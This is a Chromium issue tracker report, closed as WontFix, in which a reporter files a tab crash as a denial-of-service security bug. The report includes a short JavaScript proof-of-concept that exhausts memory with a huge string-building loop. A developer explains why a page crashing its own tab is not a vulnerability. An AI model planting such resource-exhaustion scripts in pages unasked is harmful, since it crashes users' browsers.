New issue
Advanced search Search tips

Issue 881968 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Sep 7
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 2
Type: Bug-Security



Sign in to add a comment

Denial Of Service

Reported by mishra.d...@gmail.com, Sep 7 
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

Steps to reproduce the problem:
Product affected:
OS              Linux
Chromium	68.0.3440.106 (Official Build) (64-bit)
Revision	1c32c539ce0065a41cb79da7bfcd2c71af1afe62-refs/branch-heads/3440@{#794}
JavaScript	V8 6.8.275.26

Steps to reproduce:
1. Open poc.html
2. Wait for a while
3. You see snap page!

In debug mode the below JS stack was generated.

<--- JS stacktrace --->

==== JS stack trace =========================================

    0: ExitFrame [pc: 0x3560c1f5c33d]
    1: StubFrame [pc: 0x3560c1f5d6ff]
Security context: 0x09f3d4907499 <Window map = 0xff155b02259>
    2: /* anonymous */ [0x9f3d497ebe1] [file:///home/input0/Desktop/1.html:~3] [pc=0x3560c1fc96b4](this=0x1cb6add07f51 <JSGlobal Object>)
    3: InternalFrame [pc: 0x3560c1f0eed5]
    4: EntryFrame [pc: 0x3560c1f059a1]

==== Details ================================================

[0]: ExitFrame [pc: 0...

What is the expected behavior?

What went wrong?
poc.html

<script>
var a = '';
for (var i = 1; i <= 500000000000; i++)
{
  a += '\n';
}
alert(a);
</script>

Did this work before? No 

Chrome version: 68.0.3440.106 (Official Build) (64-bit)  Channel: n/a
OS Version: 
Flash Version: Shockwave Flash 30.0 r0

Comment 1 by mpdenton@google.com, Sep 7

Status: WontFix (was: Unconfirmed)
Hi! Thank you for the report. In this case, the web page allocated far too much memory and crashed its renderer process. This is fine; if the website wants to crash its own tab it's free to do so. There are many other ways to allocate too much memory and there's not much we can do about this, nor is it too big of a deal.

I'm closing this as WontFix. We appreciate the report though, and if anything else catches your eye or behaves strangely in Chrome, please feel free to file another report.
Project Member

Comment 2 by sheriffbot@chromium.org, Dec 15

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment